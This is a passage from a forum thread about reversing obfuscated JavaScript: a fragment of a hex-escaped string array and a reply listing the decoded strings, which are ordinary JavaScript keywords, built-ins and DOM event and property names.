x45\ x6E\ x75\ x6D ", "\x74\ x72\ x61\ x6E\ x73\ x69\ x65\ x6E\ x74 ", "\x63\ x6C\ x65\ x61\ x72\ x54\ x69\ x6D\ x65\ x6F\ x75\ x74 ", "\x75\ x6E\ x64\ x65\ x66\ x69\ x6E\ x65\ x64 ", "\x53\ x74\ x72\ x69\ x6E\ x67 ", "\x70\ x72\ x69\ x76\ x61\ x74\ x65 ", "\x70\ x75\ x62\ x6C\ x69\ x63 ", "\x67\ x6F\ x74\ x6F ", "\x4E\ x75\ x6D\ x62\ x65\ x72 ", "\x65\ x6D\ x62\ x65\ x64 ", "\x62\ x6C\ x75\ x72 ", "\x61\ x6E\ x63\ x68\ x6F\ x72\ x73 ", "\x63\ x6F\ x6E\ x73\ x74 ", "\x73 ", "\x69\ x6D\ x61\ x67\ x65\ x73 ", "\x68\ x61\ x73\ x4F\ x77\ x6E\ x50\ x72\ x6F\ x70\ x65\ x72\ x74\ x79 ", "\x6F\ x6E\ x6C\ x6F\ x61\ x64 ", "\x73\ x75\ x62\ x6D\ x69\ x74 ", "\x66\ x72\ x61\ x6D\ x65\ x73 ", "\x65\ x73\ x63\ x61\ x70\ x65 ", "\x65\ x6E\ x63\ x6F\ x64\ x65\ x55\ x52\ x49 ", "\x73\ x63\ x72\ x65\ x65\ x6E\ x58 ", "\x73\ x79\ x6E\ x63\ x68\ x72\ x6F\ x6E\ x69\ x7A\ x65\ x64 ", "\x65\ x6E\ x63\ x6F\ x64\ x65\ x55\ x52\ x49\ x43\ x6F\ x6D\ x70\ x6F\ x6E\ x65\ x6E\ x74 ", "\x6E\ x75\ x6C\ x6C ", "\x6F\ x6E\ x65\ x72\ x72\ x6F\ x72 ", "\x63\ x6F\ x6E\ x74\ x69\ x6E\ x75\ x65 ", "\x6E\ x61\ x76\ x69\ x67\ x61\ x74\ x65 ", "\x44\ x61\ x74\ x65 ", "\x69\ x6D\ x70\ x6C\ x65\ x6D\ x65\ x6E\ x74\ x73 ", "\x77\ x69\ x74\ x68 ", "\x6C\ x61\ x79\ x65\ x72 ", "\x70\ x61\ x72\ x65\ x6E\ x74 "

My forum: hackrhouse.freeforums.net

Username

hackr8

Posts

43

Joined

Fri Dec 21, 2018 1:50 pm

Contact

Re: Reversing Javascript Help

#32469 by hackr8
Thu Jan 17, 2019 10:31 am

Well, I actually found the strings. Here is the light you asked for:

Code: Select all

"onmouseover",
"pkcs11",
"textarea",
"form",
"packages",
"toString",
"confirm",
"while",
"mimeTypes",
"defaultStatus",
"parseFloat",
"top",
"onmousedown",
"return",
"closed",
"fromCharCode",
"function",
"abstract",
"window",
"double",
"prompt",
"NaN",
"char",
"alert",
"innerHeight",
"protected",
"self",
"toUpperCase",
"i",
"onkeypress",
"try",
"Infinity",
"constructor",
"navigator",
"outerHeight",
"isPrototypeOf",
"forms",
"throw",
"onkeydown",
"select",
"innerWidth",
"reset",
"short",
"interface",
"typeof",
"switch",
"element",
"byte",
"Object",
"in",
"image",
"setTimeout",
"frameRate",
"new",
"delete",
"opener",
"package",
"offscreenBuffering",
"decodeURIComponent",
"P",
"do",
"C",
"crypto",
"layers",
"onclick",
"default",
"decodeURI",
"outerWidth",
"onkeyup",
"name",
"extends",
"onblur",
"anchor",
"valueOf",
"untaint",
"_",
"hidden",
"split",
"debugger",
"final",
"A",
"yield",
"embeds",
"instanceof",
"fileUpload",
"export",
"frame",
"propertyIsEnum"
,"transient",
"clearTimeout",
"undefined",
"String",
"private",
"public",
"goto",
"Number",
"embed",
"blur",
"anchors",
"const",
"s",
"images",
"hasOwnProperty",
"onload",
"submit",
"frames",
"escape",
"encodeURI",
"screenX",
"synchronized",
"encodeURIComponent",
"null",
"onerror",
"continue",
"navigate",
"Date",
"implements",
"with",
"layer",
"parent"

My forum: hackrhouse.freeforums.net

Username

hackr8

Posts

43

Joined

Fri Dec 21, 2018 1:50 pm

Contact